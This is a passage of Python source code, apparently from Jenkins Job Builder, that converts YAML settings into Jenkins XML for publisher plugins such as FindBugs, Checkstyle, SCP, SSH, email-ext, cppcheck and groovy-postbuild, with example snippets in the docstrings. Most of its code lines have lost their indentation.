XML.SubElement(config, 'sourcePathPattern')
XML.SubElement(config, 'fauxProjectPath')
XML.SubElement(config, 'encoding').text = 'default'
def findbugs(parser, xml_parent, data):
"""yaml: findbugs
FindBugs reporting for builds
Requires the Jenkins :jenkins-wiki:`FindBugs Plugin
<FindBugs+Plugin>`.
:arg str pattern: specifies the generated raw FindBugs XML report files,
such as \*\*/findbugs.xml or \*\*/findbugsXml.xml. (default '')
:arg bool rank-priority: Use rank as priority (default false)
:arg str include-files: Comma separated list of files to include.
(default '')
:arg str exclude-files: Comma separated list of files to exclude.
(default '')
    :arg bool can-run-on-failed: Whether or not to run plug-in on failed builds
        (default false)
:arg bool should-detect-modules: Determines if Ant or Maven modules should
be detected for all files that contain warnings. (default false)
:arg int healthy: Sunny threshold (default '')
:arg int unhealthy: Stormy threshold (default '')
:arg str health-threshold: Threshold priority for health status
('low', 'normal' or 'high', defaulted to 'low')
:arg bool dont-compute-new: If set to false, computes new warnings based on
the reference build (default true)
:arg bool use-delta-values: Use delta for new warnings. (default false)
:arg bool use-previous-build-as-reference: If set then the number of new
warnings will always be calculated based on the previous build.
Otherwise the reference build. (default false)
:arg bool use-stable-build-as-reference: The number of new warnings will be
calculated based on the last stable build, allowing reverts of unstable
builds where the number of warnings was decreased. (default false)
:arg dict thresholds:
:thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
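
    A short illustrative snippet (the pattern and threshold numbers below are
    placeholder values, not defaults):

    .. code-block:: yaml

        publishers:
          - findbugs:
              pattern: '**/findbugsXml.xml'
              rank-priority: true
              can-run-on-failed: true
              healthy: 0
              unhealthy: 100
              health-threshold: 'high'
              thresholds:
                unstable:
                  total-all: 90
                failed:
                  total-all: 100
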
Minimal Example:
.. literalinclude:: /../../tests/reporters/fixtures/findbugs-minimal.yaml
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/findbugs01.yaml
"""
findbugs = XML.SubElement(xml_parent,
'hudson.plugins.findbugs.FindBugsPublisher')
findbugs.set('plugin', 'findbugs')
helpers.findbugs_settings(findbugs, data)
helpers.build_trends_publisher('[FINDBUGS] ', findbugs, data)
def checkstyle(parser, xml_parent, data):
"""yaml: checkstyle
Publish trend reports with Checkstyle.
Requires the Jenkins :jenkins-wiki:`Checkstyle Plugin <Checkstyle+Plugin>`.
The checkstyle component accepts a dictionary with the
following values:
:arg str pattern: Report filename pattern (optional)
:arg bool can-run-on-failed: Also runs for failed builds, instead of just
stable or unstable builds (default false)
:arg bool should-detect-modules: Determines if Ant or Maven modules should
be detected for all files that contain warnings (default false)
:arg int healthy: Sunny threshold (optional)
:arg int unhealthy: Stormy threshold (optional)
:arg str health-threshold: Threshold priority for health status
('low', 'normal' or 'high', defaulted to 'low')
:arg dict thresholds: Mark build as failed or unstable if the number of
errors exceeds a threshold. (optional)
:thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
:arg str default-encoding: Encoding for parsing or showing files (optional)
:arg bool do-not-resolve-relative-paths: (default false)
:arg bool dont-compute-new: If set to false, computes new warnings based on
the reference build (default true)
:arg bool use-previous-build-as-reference: determines whether to always
use the previous build as the reference build (default false)
:arg bool use-stable-build-as-reference: The number of new warnings will be
calculated based on the last stable build, allowing reverts of unstable
builds where the number of warnings was decreased. (default false)
:arg bool use-delta-values: If set then the number of new warnings is
calculated by subtracting the total number of warnings of the current
build from the reference build.
(default false)
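
    A short illustrative snippet (the pattern and threshold numbers below are
    placeholder values, not defaults):

    .. code-block:: yaml

        publishers:
          - checkstyle:
              pattern: '**/checkstyle-result.xml'
              can-run-on-failed: true
              healthy: 0
              unhealthy: 100
              health-threshold: 'high'
              thresholds:
                unstable:
                  total-high: 10
                failed:
                  total-high: 1
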
Example:
.. literalinclude:: /../../tests/publishers/fixtures/checkstyle004.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/checkstyle006.yaml
:language: yaml
"""
def convert_settings(lookup, data):
"""Helper to convert settings from one key to another
"""
for old_key in list(data.keys()):
if old_key in lookup:
data.setdefault(lookup[old_key], data[old_key])
del data[old_key]
xml_element = XML.SubElement(xml_parent,
'hudson.plugins.checkstyle.'
'CheckStylePublisher')
# Convert old style yaml to new style
convert_settings({
'unHealthy': 'unhealthy',
'healthThreshold': 'health-threshold',
'defaultEncoding': 'default-encoding',
'canRunOnFailed': 'can-run-on-failed',
'shouldDetectModules': 'should-detect-modules'
}, data)
threshold_data = data.get('thresholds', {})
for threshold in ['unstable', 'failed']:
convert_settings({
'totalAll': 'total-all',
'totalHigh': 'total-high',
'totalNormal': 'total-normal',
'totalLow': 'total-low'
}, threshold_data.get(threshold, {}))
helpers.build_trends_publisher('[CHECKSTYLE] ', xml_element, data)
def scp(parser, xml_parent, data):
"""yaml: scp
Upload files via SCP
Requires the Jenkins :jenkins-wiki:`SCP Plugin <SCP+plugin>`.
When writing a publisher macro, it is important to keep in mind that
Jenkins uses Ant's `SCP Task
<https://ant.apache.org/manual/Tasks/scp.html>`_ via the Jenkins
:jenkins-wiki:`SCP Plugin <SCP+plugin>` which relies on `FileSet
<https://ant.apache.org/manual/Types/fileset.html>`_
and `DirSet <https://ant.apache.org/manual/Types/dirset.html>`_ patterns.
The relevant piece of documentation is excerpted below:
Source points to files which will be uploaded. You can use ant
includes syntax, eg. ``folder/dist/*.jar``. Path is constructed from
workspace root. Note that you cannot point files outside the workspace
directory. For example providing: ``../myfile.txt`` won't work...
Destination points to destination folder on remote site. It will be
created if doesn't exists and relative to root repository path. You
can define multiple blocks of source/destination pairs.
This means that absolute paths, e.g., ``/var/log/**`` will not work and
will fail to compile. All paths need to be relative to the directory that
the publisher runs and the paths have to be contained inside of that
directory. The relative working directory is usually::
/home/jenkins/workspace/${JOB_NAME}
:arg str site: name of the scp site
:arg str target: destination directory
:arg str source: source path specifier
:arg bool keep-hierarchy: keep the file hierarchy when uploading
(default false)
:arg bool copy-after-failure: copy files even if the job fails
(default false)
:arg bool copy-console: copy the console log (default false); if
specified, omit 'source'
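
    A short illustrative snippet; note that each target/source pair is listed
    under a ``files`` entry, matching the parsing code below (the site name
    and paths are placeholders):

    .. code-block:: yaml

        publishers:
          - scp:
              site: 'example.com'
              files:
                - target: 'dest/dir'
                  source: 'base/source/dir/**'
                  keep-hierarchy: true
                - target: 'logs'
                  copy-console: true
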
Example:
.. literalinclude:: /../../tests/publishers/fixtures/scp001.yaml
:language: yaml
"""
site = data['site']
scp = XML.SubElement(xml_parent,
'be.certipost.hudson.plugin.SCPRepositoryPublisher')
XML.SubElement(scp, 'siteName').text = site
entries = XML.SubElement(scp, 'entries')
for entry in data['files']:
entry_e = XML.SubElement(entries, 'be.certipost.hudson.plugin.Entry')
XML.SubElement(entry_e, 'filePath').text = entry['target']
XML.SubElement(entry_e, 'sourceFile').text = entry.get('source', '')
if entry.get('keep-hierarchy', False):
XML.SubElement(entry_e, 'keepHierarchy').text = 'true'
else:
XML.SubElement(entry_e, 'keepHierarchy').text = 'false'
if entry.get('copy-console', False):
XML.SubElement(entry_e, 'copyConsoleLog').text = 'true'
else:
XML.SubElement(entry_e, 'copyConsoleLog').text = 'false'
if entry.get('copy-after-failure', False):
XML.SubElement(entry_e, 'copyAfterFailure').text = 'true'
else:
XML.SubElement(entry_e, 'copyAfterFailure').text = 'false'
def ssh(parser, xml_parent, data):
"""yaml: ssh
Upload files via SCP.
Requires the Jenkins :jenkins-wiki:`Publish over SSH Plugin
<Publish+Over+SSH+Plugin>`.
:arg str site: name of the ssh site
:arg str target: destination directory
:arg bool target-is-date-format: whether target is a date format. If true,
raw text should be quoted (default false)
:arg bool clean-remote: should the remote directory be deleted before
transferring files (default false)
:arg str source: source path specifier
:arg str command: a command to execute on the remote server (optional)
:arg int timeout: timeout in milliseconds for the Exec command (optional)
:arg bool use-pty: run the exec command in pseudo TTY (default false)
:arg str excludes: excluded file pattern (optional)
:arg str remove-prefix: prefix to remove from uploaded file paths
(optional)
:arg bool fail-on-error: fail the build if an error occurs (default false).
    :arg bool always-publish-from-master: transfer the files through the master
        before being sent to the remote server (default false)
:arg bool flatten: only create files on the server, don't create
directories (default false).
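
    A short illustrative snippet (the site name, paths and command below are
    placeholder values, not defaults):

    .. code-block:: yaml

        publishers:
          - ssh:
              site: 'server.example.com'
              target: 'dest/dir'
              source: 'base/source/dir/**'
              remove-prefix: 'base/source/dir'
              excludes: '**/*.excludedfiletype'
              command: 'rm -r jenkins_$BUILD_NUMBER'
              timeout: 1800000
              flatten: true
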
Example:
.. literalinclude:: /../../tests/publishers/fixtures/ssh001.yaml
:language: yaml
"""
console_prefix = 'SSH: '
plugin_tag = 'jenkins.plugins.publish__over__ssh.BapSshPublisherPlugin'
publisher_tag = 'jenkins.plugins.publish__over__ssh.BapSshPublisher'
transfer_tag = 'jenkins.plugins.publish__over__ssh.BapSshTransfer'
plugin_reference_tag = 'jenkins.plugins.publish_over_ssh.' \
'BapSshPublisherPlugin'
base_publish_over(xml_parent,
data,
console_prefix,
plugin_tag,
publisher_tag,
transfer_tag,
plugin_reference_tag)
def pipeline(parser, xml_parent, data):
"""yaml: pipeline
Specify a downstream project in a pipeline.
Requires the Jenkins :jenkins-wiki:`Build Pipeline Plugin
<Build+Pipeline+Plugin>`.
:arg str project: the name of the downstream project
:arg str predefined-parameters: parameters to pass to the other
job (optional)
:arg bool current-parameters: Whether to include the parameters passed
to the current build to the triggered job (optional)
:arg str property-file: Use properties from file (optional)
:arg bool fail-on-missing: Blocks the triggering of the downstream jobs
if any of the property files are not found in the workspace.
Only valid when 'property-file' is specified.
(default false)
:arg str file-encoding: Encoding of contents of the files. If not
specified, default encoding of the platform is used. Only valid when
'property-file' is specified. (optional)
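
    A short illustrative snippet (the project name and parameters below are
    placeholders):

    .. code-block:: yaml

        publishers:
          - pipeline:
              project: 'deploy-job'
              current-parameters: true
              predefined-parameters: 'ENVIRONMENT=staging'
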
Example:
.. literalinclude:: /../../tests/publishers/fixtures/pipeline002.yaml
:language: yaml
.. literalinclude:: /../../tests/publishers/fixtures/pipeline003.yaml
:language: yaml
You can build pipeline jobs that are re-usable in different pipelines by
using a :ref:`job-template` to define the pipeline jobs,
and variable substitution to specify the name of
the downstream job in the pipeline.
Job-specific substitutions are useful here (see :ref:`project`).
See 'samples/pipeline.yaml' for an example pipeline implementation.
"""
if 'project' in data and data['project'] != '':
pippub = XML.SubElement(xml_parent,
'au.com.centrumsystems.hudson.plugin.'
'buildpipeline.trigger.BuildPipelineTrigger')
configs = XML.SubElement(pippub, 'configs')
if 'predefined-parameters' in data:
params = XML.SubElement(configs,
'hudson.plugins.parameterizedtrigger.'
'PredefinedBuildParameters')
properties = XML.SubElement(params, 'properties')
properties.text = data['predefined-parameters']
if ('current-parameters' in data
and data['current-parameters']):
XML.SubElement(configs,
'hudson.plugins.parameterizedtrigger.'
'CurrentBuildParameters')
if 'property-file' in data and data['property-file']:
params = XML.SubElement(configs,
'hudson.plugins.parameterizedtrigger.'
'FileBuildParameters')
properties = XML.SubElement(params, 'propertiesFile')
properties.text = data['property-file']
failOnMissing = XML.SubElement(params, 'failTriggerOnMissing')
failOnMissing.text = str(
data.get('fail-on-missing', False)).lower()
if 'file-encoding' in data:
XML.SubElement(params, 'encoding'
).text = data['file-encoding']
XML.SubElement(pippub, 'downstreamProjectNames').text = data['project']
def email(parser, xml_parent, data):
"""yaml: email
Email notifications on build failure.
Requires the Jenkins :jenkins-wiki:`Mailer Plugin
<Mailer>`.
:arg str recipients: Space separated list of recipient email addresses
(required)
:arg bool notify-every-unstable-build: Send an email for every
unstable build (default true)
:arg bool send-to-individuals: Send an email to the individual
who broke the build (default false)
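
    A short illustrative snippet (the addresses below are placeholders):

    .. code-block:: yaml

        publishers:
          - email:
              recipients: 'dev-list@example.com breakers@example.com'
              notify-every-unstable-build: false
              send-to-individuals: true
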
Example:
.. literalinclude::
/../../tests/publishers/fixtures/email-minimal.yaml
:language: yaml
.. literalinclude:: /../../tests/publishers/fixtures/email-complete.yaml
:language: yaml
"""
# TODO: raise exception if this is applied to a maven job
mailer = XML.SubElement(xml_parent,
'hudson.tasks.Mailer')
try:
XML.SubElement(mailer, 'recipients').text = data['recipients']
except KeyError as e:
raise MissingAttributeError(e)
    # Note the logic reversal (included here to match the GUI)
if data.get('notify-every-unstable-build', True):
XML.SubElement(mailer, 'dontNotifyEveryUnstableBuild').text = 'false'
else:
XML.SubElement(mailer, 'dontNotifyEveryUnstableBuild').text = 'true'
XML.SubElement(mailer, 'sendToIndividuals').text = str(
data.get('send-to-individuals', False)).lower()
def claim_build(parser, xml_parent, data):
"""yaml: claim-build
Claim build failures
Requires the Jenkins :jenkins-wiki:`Claim Plugin <Claim+plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/claim-build001.yaml
:language: yaml
"""
XML.SubElement(xml_parent, 'hudson.plugins.claim.ClaimPublisher')
def base_email_ext(parser, xml_parent, data, ttype):
trigger = XML.SubElement(xml_parent,
'hudson.plugins.emailext.plugins.trigger.'
+ ttype)
email = XML.SubElement(trigger, 'email')
XML.SubElement(email, 'recipientList').text = ''
XML.SubElement(email, 'subject').text = '$PROJECT_DEFAULT_SUBJECT'
XML.SubElement(email, 'body').text = '$PROJECT_DEFAULT_CONTENT'
if 'send-to' in data:
XML.SubElement(email, 'sendToDevelopers').text = \
str('developers' in data['send-to']).lower()
XML.SubElement(email, 'sendToRequester').text = \
str('requester' in data['send-to']).lower()
XML.SubElement(email, 'includeCulprits').text = \
str('culprits' in data['send-to']).lower()
XML.SubElement(email, 'sendToRecipientList').text = \
str('recipients' in data['send-to']).lower()
else:
XML.SubElement(email, 'sendToRequester').text = 'false'
XML.SubElement(email, 'sendToDevelopers').text = 'false'
XML.SubElement(email, 'includeCulprits').text = 'false'
XML.SubElement(email, 'sendToRecipientList').text = 'true'
def email_ext(parser, xml_parent, data):
"""yaml: email-ext
    Extend Jenkins' built-in email notification
Requires the Jenkins :jenkins-wiki:`Email-ext Plugin
<Email-ext+plugin>`.
    :arg bool disable-publisher: Disable the publisher, while maintaining the
        settings. The usage model for this is when you want to test things out
        in the build without sending out e-mails during the testing. A message
        will be printed to the build log saying that the publisher is disabled.
        (default false)
:arg str recipients: Comma separated list of recipient email addresses
:arg str reply-to: Comma separated list of email addresses that should be
in the Reply-To header for this project (default $DEFAULT_REPLYTO)
:arg str content-type: The content type of the emails sent. If not set, the
Jenkins plugin uses the value set on the main configuration page.
Possible values: 'html', 'text', 'both-html-text' or 'default'
(default 'default')
:arg str subject: Subject for the email, can include variables like
${BUILD_NUMBER} or even groovy or javascript code
:arg str body: Content for the body of the email, can include variables
like ${BUILD_NUMBER}, but the real magic is using groovy or
javascript to hook into the Jenkins API itself
:arg bool attach-build-log: Include build log in the email (default false)
:arg str attachments: pattern of files to include as attachment (optional)
:arg bool always: Send an email for every result (default false)
:arg bool unstable: Send an email for an unstable result (default false)
:arg bool first-failure: Send an email for just the first failure
(default false)
:arg bool not-built: Send an email if not built (default false)
:arg bool aborted: Send an email if the build is aborted (default false)
:arg bool regression: Send an email if there is a regression
(default false)
:arg bool failure: Send an email if the build fails (default true)
:arg bool second-failure: Send an email for the second failure
(default false)
:arg bool improvement: Send an email if the build improves (default false)
:arg bool still-failing: Send an email if the build is still failing
(default false)
:arg bool success: Send an email for a successful build (default false)
:arg bool fixed: Send an email if the build is fixed (default false)
:arg bool still-unstable: Send an email if the build is still unstable
(default false)
:arg bool pre-build: Send an email before the build (default false)
    :arg str presend-script: A Groovy script executed prior to sending the
        mail. (default '')
:arg bool save-output: Save email content to workspace (default false)
:arg str matrix-trigger: If using matrix projects, when to trigger
:matrix-trigger values:
* **both**
* **only-parent**
* **only-configurations**
:arg list send-to: list of recipients from the predefined groups
:send-to values:
* **developers** (disabled by default)
* **requester** (disabled by default)
* **culprits** (disabled by default)
* **recipients** (enabled by default)
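
    A short illustrative snippet (the addresses, subject and body below are
    placeholder values, not defaults):

    .. code-block:: yaml

        publishers:
          - email-ext:
              recipients: 'foo@example.com, bar@example.com'
              reply-to: 'noreply@example.com'
              content-type: html
              subject: 'Build ${BUILD_NUMBER} finished'
              body: 'See ${BUILD_URL} for details'
              failure: true
              fixed: true
              attach-build-log: false
              matrix-trigger: only-parent
              send-to:
                - requester
                - recipients
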
Example:
.. literalinclude:: /../../tests/publishers/fixtures/email-ext001.yaml
:language: yaml
"""
emailext = XML.SubElement(xml_parent,
'hudson.plugins.emailext.ExtendedEmailPublisher')
if 'recipients' in data:
XML.SubElement(emailext, 'recipientList').text = data['recipients']
else:
XML.SubElement(emailext, 'recipientList').text = '$DEFAULT_RECIPIENTS'
ctrigger = XML.SubElement(emailext, 'configuredTriggers')
if data.get('always', False):
base_email_ext(parser, ctrigger, data, 'AlwaysTrigger')
if data.get('unstable', False):
base_email_ext(parser, ctrigger, data, 'UnstableTrigger')
if data.get('first-failure', False):
base_email_ext(parser, ctrigger, data, 'FirstFailureTrigger')
if data.get('not-built', False):
base_email_ext(parser, ctrigger, data, 'NotBuiltTrigger')
if data.get('aborted', False):
base_email_ext(parser, ctrigger, data, 'AbortedTrigger')
if data.get('regression', False):
base_email_ext(parser, ctrigger, data, 'RegressionTrigger')
if data.get('failure', True):
base_email_ext(parser, ctrigger, data, 'FailureTrigger')
if data.get('second-failure', False):
base_email_ext(parser, ctrigger, data, 'SecondFailureTrigger')
if data.get('improvement', False):
base_email_ext(parser, ctrigger, data, 'ImprovementTrigger')
if data.get('still-failing', False):
base_email_ext(parser, ctrigger, data, 'StillFailingTrigger')
if data.get('success', False):
base_email_ext(parser, ctrigger, data, 'SuccessTrigger')
if data.get('fixed', False):
base_email_ext(parser, ctrigger, data, 'FixedTrigger')
if data.get('still-unstable', False):
base_email_ext(parser, ctrigger, data, 'StillUnstableTrigger')
if data.get('pre-build', False):
base_email_ext(parser, ctrigger, data, 'PreBuildTrigger')
content_type_mime = {
'text': 'text/plain',
'html': 'text/html',
'default': 'default',
'both-html-text': 'both',
}
ctype = data.get('content-type', 'default')
if ctype not in content_type_mime:
raise JenkinsJobsException('email-ext content type must be one of: %s'
% ', '.join(content_type_mime.keys()))
XML.SubElement(emailext, 'contentType').text = content_type_mime[ctype]
XML.SubElement(emailext, 'defaultSubject').text = data.get(
'subject', '$DEFAULT_SUBJECT')
XML.SubElement(emailext, 'defaultContent').text = data.get(
'body', '$DEFAULT_CONTENT')
XML.SubElement(emailext, 'attachmentsPattern').text = data.get(
'attachments', '')
XML.SubElement(emailext, 'presendScript').text = data.get(
'presend-script', '')
XML.SubElement(emailext, 'attachBuildLog').text = str(data.get(
'attach-build-log', False)).lower()
XML.SubElement(emailext, 'saveOutput').text = str(data.get(
'save-output', False)).lower()
XML.SubElement(emailext, 'disabled').text = str(data.get(
'disable-publisher', False)).lower()
XML.SubElement(emailext, 'replyTo').text = data.get('reply-to',
'$DEFAULT_REPLYTO')
matrix_dict = {'both': 'BOTH',
'only-configurations': 'ONLY_CONFIGURATIONS',
'only-parent': 'ONLY_PARENT'}
matrix_trigger = data.get('matrix-trigger', None)
# If none defined, then do not create entry
if matrix_trigger is not None:
if matrix_trigger not in matrix_dict:
raise JenkinsJobsException("matrix-trigger entered is not valid, "
"must be one of: %s" %
", ".join(matrix_dict.keys()))
XML.SubElement(emailext, 'matrixTriggerMode').text = \
matrix_dict.get(matrix_trigger)
def fingerprint(parser, xml_parent, data):
"""yaml: fingerprint
Fingerprint files to track them across builds
:arg str files: files to fingerprint, follows the @includes of Ant fileset
(default blank)
:arg bool record-artifacts: fingerprint all archived artifacts
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/fingerprint001.yaml
:language: yaml
"""
finger = XML.SubElement(xml_parent, 'hudson.tasks.Fingerprinter')
XML.SubElement(finger, 'targets').text = data.get('files', '')
XML.SubElement(finger, 'recordBuildArtifacts').text = str(data.get(
'record-artifacts', False)).lower()
def aggregate_tests(parser, xml_parent, data):
"""yaml: aggregate-tests
Aggregate downstream test results
:arg bool include-failed-builds: whether to include failed builds
Example:
.. literalinclude::
/../../tests/publishers/fixtures/aggregate-tests001.yaml
:language: yaml
"""
agg = XML.SubElement(xml_parent,
'hudson.tasks.test.AggregatedTestResultPublisher')
XML.SubElement(agg, 'includeFailedBuilds').text = str(data.get(
'include-failed-builds', False)).lower()
def aggregate_flow_tests(parser, xml_parent, data):
"""yaml: aggregate-flow-tests
Aggregate downstream test results in a Build Flow job.
Requires the Jenkins :jenkins-wiki:`Build Flow Test Aggregator Plugin
<Build+Flow+Test+Aggregator+Plugin>`.
:arg bool show-test-results-trend: whether to show test results
trend graph (default true)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/aggregate-flow-tests002.yaml
:language: yaml
"""
agg_flow = XML.SubElement(xml_parent, 'org.zeroturnaround.jenkins.'
'flowbuildtestaggregator.FlowTestAggregator')
XML.SubElement(agg_flow, 'showTestResultTrend').text = str(
data.get('show-test-results-trend', True)).lower()
def cppcheck(parser, xml_parent, data):
"""yaml: cppcheck
Cppcheck result publisher
Requires the Jenkins :jenkins-wiki:`Cppcheck Plugin <Cppcheck+Plugin>`.
:arg str pattern: file pattern for cppcheck xml report
for more optional parameters see the example
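
    A short illustrative snippet showing the optional thresholds and graph
    settings handled by this publisher (the numbers below are placeholders):

    .. code-block:: yaml

        publishers:
          - cppcheck:
              pattern: '**/cppcheck-result.xml'
              ignoreblankfiles: true
              thresholds:
                unstable: 5
                failure: 10
                healthy: 0
                unhealthy: 10
                severity:
                  error: true
                  warning: true
                  style: false
              graph:
                xysize: [500, 200]
                display:
                  sum: false
                  error: true
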
Example:
.. literalinclude:: /../../tests/publishers/fixtures/cppcheck001.yaml
:language: yaml
"""
cppextbase = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.cppcheck.'
'CppcheckPublisher')
cppext = XML.SubElement(cppextbase, 'cppcheckConfig')
XML.SubElement(cppext, 'pattern').text = data['pattern']
XML.SubElement(cppext, 'ignoreBlankFiles').text = \
str(data.get('ignoreblankfiles', False)).lower()
csev = XML.SubElement(cppext, 'configSeverityEvaluation')
thrsh = data.get('thresholds', {})
XML.SubElement(csev, 'threshold').text = str(thrsh.get('unstable', ''))
XML.SubElement(csev, 'newThreshold').text = \
str(thrsh.get('new-unstable', ''))
XML.SubElement(csev, 'failureThreshold').text = \
str(thrsh.get('failure', ''))
XML.SubElement(csev, 'newFailureThreshold').text = \
str(thrsh.get('new-failure', ''))
XML.SubElement(csev, 'healthy').text = str(thrsh.get('healthy', ''))
XML.SubElement(csev, 'unHealthy').text = str(thrsh.get('unhealthy', ''))
sev = thrsh.get('severity', {})
XML.SubElement(csev, 'severityError').text = \
str(sev.get('error', True)).lower()
XML.SubElement(csev, 'severityWarning').text = \
str(sev.get('warning', True)).lower()
XML.SubElement(csev, 'severityStyle').text = \
str(sev.get('style', True)).lower()
XML.SubElement(csev, 'severityPerformance').text = \
str(sev.get('performance', True)).lower()
XML.SubElement(csev, 'severityInformation').text = \
str(sev.get('information', True)).lower()
graph = data.get('graph', {})
cgraph = XML.SubElement(cppext, 'configGraph')
x, y = graph.get('xysize', [500, 200])
XML.SubElement(cgraph, 'xSize').text = str(x)
XML.SubElement(cgraph, 'ySize').text = str(y)
gdisplay = graph.get('display', {})
XML.SubElement(cgraph, 'displayAllErrors').text = \
str(gdisplay.get('sum', True)).lower()
XML.SubElement(cgraph, 'displayErrorSeverity').text = \
str(gdisplay.get('error', False)).lower()
XML.SubElement(cgraph, 'displayWarningSeverity').text = \
str(gdisplay.get('warning', False)).lower()
XML.SubElement(cgraph, 'displayStyleSeverity').text = \
str(gdisplay.get('style', False)).lower()
XML.SubElement(cgraph, 'displayPerformanceSeverity').text = \
str(gdisplay.get('performance', False)).lower()
XML.SubElement(cgraph, 'displayInformationSeverity').text = \
str(gdisplay.get('information', False)).lower()
def logparser(parser, xml_parent, data):
"""yaml: logparser
Requires the Jenkins :jenkins-wiki:`Log Parser Plugin <Log+Parser+Plugin>`.
:arg str parse-rules: full path to parse rules
:arg bool unstable-on-warning: mark build unstable on warning
:arg bool fail-on-error: mark build failed on error
Example:
.. literalinclude:: /../../tests/publishers/fixtures/logparser001.yaml
:language: yaml
"""
clog = XML.SubElement(xml_parent,
'hudson.plugins.logparser.LogParserPublisher')
XML.SubElement(clog, 'unstableOnWarning').text = \
str(data.get('unstable-on-warning', False)).lower()
XML.SubElement(clog, 'failBuildOnError').text = \
str(data.get('fail-on-error', False)).lower()
# v1.08: this must be the full path, the name of the rules is not enough
XML.SubElement(clog, 'parsingRulesPath').text = data.get('parse-rules', '')
def copy_to_master(parser, xml_parent, data):
"""yaml: copy-to-master
Copy files to master from slave
Requires the Jenkins :jenkins-wiki:`Copy To Slave Plugin
<Copy+To+Slave+Plugin>`.
:arg list includes: list of file patterns to copy
:arg list excludes: list of file patterns to exclude
:arg string destination: absolute path into which the files will be copied.
If left blank they will be copied into the
workspace of the current job
Example:
.. literalinclude::
/../../tests/publishers/fixtures/copy-to-master001.yaml
:language: yaml
"""
p = 'com.michelin.cio.hudson.plugins.copytoslave.CopyToMasterNotifier'
cm = XML.SubElement(xml_parent, p)
XML.SubElement(cm, 'includes').text = ','.join(data.get('includes', ['']))
XML.SubElement(cm, 'excludes').text = ','.join(data.get('excludes', ['']))
XML.SubElement(cm, 'destinationFolder').text = \
data.get('destination', '')
if data.get('destination', ''):
XML.SubElement(cm, 'overrideDestinationFolder').text = 'true'
def jira(parser, xml_parent, data):
"""yaml: jira
Update relevant JIRA issues
Requires the Jenkins :jenkins-wiki:`JIRA Plugin <JIRA+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/jira001.yaml
:language: yaml
"""
XML.SubElement(xml_parent, 'hudson.plugins.jira.JiraIssueUpdater')
def groovy_postbuild(parser, xml_parent, data):
"""yaml: groovy-postbuild
Execute a groovy script.
Requires the Jenkins :jenkins-wiki:`Groovy Postbuild Plugin
<Groovy+Postbuild+Plugin>`.
    Please pay attention to the version of the plugin you have installed:
    there were incompatible changes between 1.x and 2.x. See the plugin's
    :jenkins-wiki:`home page <Groovy+Postbuild+Plugin>` for full information,
    including the migration process.
:arg str script: The groovy script to execute
:arg list classpath: List of additional classpaths (>=1.6)
    :arg str on-failure: What to do when the script fails: leave the build
        as it is for "nothing", mark the build as unstable for "unstable"
        and mark the job as failed for "failed" (default "nothing")
:arg bool matrix-parent: Run script for matrix parent only (>=1.9)
(default false)
:arg bool sandbox: Execute script inside of groovy sandbox (>=2.0)
(default false)
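
    A short illustrative snippet (the script and classpath below are
    placeholders):

    .. code-block:: yaml

        publishers:
          - groovy-postbuild:
              script: 'println "post-build check"'
              classpath:
                - 'file:///var/lib/jenkins/lib/postbuild.jar'
              on-failure: unstable
              matrix-parent: false
              sandbox: false
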
Example:
.. literalinclude::
/../../tests/publishers/fixtures/groovy-postbuild001.yaml
:language: yaml
"""
logger = logging.getLogger("%s:groovy-postbuild" % __name__)
# Backward compatibility with old format
if isinstance(data, six.string_types):
        logger.warn(
            "You are using a deprecated configuration format; please follow "
            "the documentation to update it. It will not be supported in "
            "future releases!"
        )
data = {
'script': data,
}
# There are incompatible changes, we need to know version
info = parser.registry.get_plugin_info('groovy-postbuild')
version = pkg_resources.parse_version(info.get('version', "0"))
# Version specific predicates
matrix_parent_support = version >= pkg_resources.parse_version("1.9")
security_plugin_support = version >= pkg_resources.parse_version("2.0")
extra_classpath_support = version >= pkg_resources.parse_version("1.6")
root_tag = (
'org.jvnet.hudson.plugins.groovypostbuild.GroovyPostbuildRecorder'
)
groovy = XML.SubElement(xml_parent, root_tag)
behavior = data.get('on-failure')
XML.SubElement(groovy, 'behavior').text = {
'unstable': '1',
'failed': '2',
}.get(behavior, '0')
if matrix_parent_support:
XML.SubElement(
groovy,
'runForMatrixParent',
).text = str(data.get('matrix-parent', False)).lower()
classpaths = data.get('classpath', list())
if security_plugin_support:
script = XML.SubElement(groovy, 'script')
XML.SubElement(script, 'script').text = data.get('script')
XML.SubElement(script, 'sandbox').text = str(
data.get('sandbox', False)
).lower()
if classpaths:
classpath = XML.SubElement(script, 'classpath')
for path in classpaths:
script_path = XML.SubElement(classpath, 'entry')
XML.SubElement(script_path, 'url').text = path
else:
XML.SubElement(groovy, 'groovyScript').text = data.get('script')
if extra_classpath_support and classpaths:
classpath = XML.SubElement(groovy, 'classpath')
for path in classpaths:
script_path = XML.SubElement(
classpath,
'org.jvnet.hudson.plugins.groovypostbuild.'
'GroovyScriptPath',
)
XML.SubElement(script_path, 'path').text = path
def base_publish_over(xml_parent, data, console_prefix,
plugin_tag, publisher_tag,
transferset_tag, reference_plugin_tag):
outer = XML.SubElement(xml_parent, plugin_tag)
XML.SubElement(outer, 'consolePrefix').text = console_prefix
delegate = XML.SubElement(outer, 'delegate')
publishers = XML.SubElement(delegate, 'publishers')
inner = XML.SubElement(publishers, publisher_tag)
XML.SubElement(inner, 'configName').text = data['site']
XML.SubElement(inner, 'verbose').text = 'true'
transfers = XML.SubElement(inner, 'transfers')
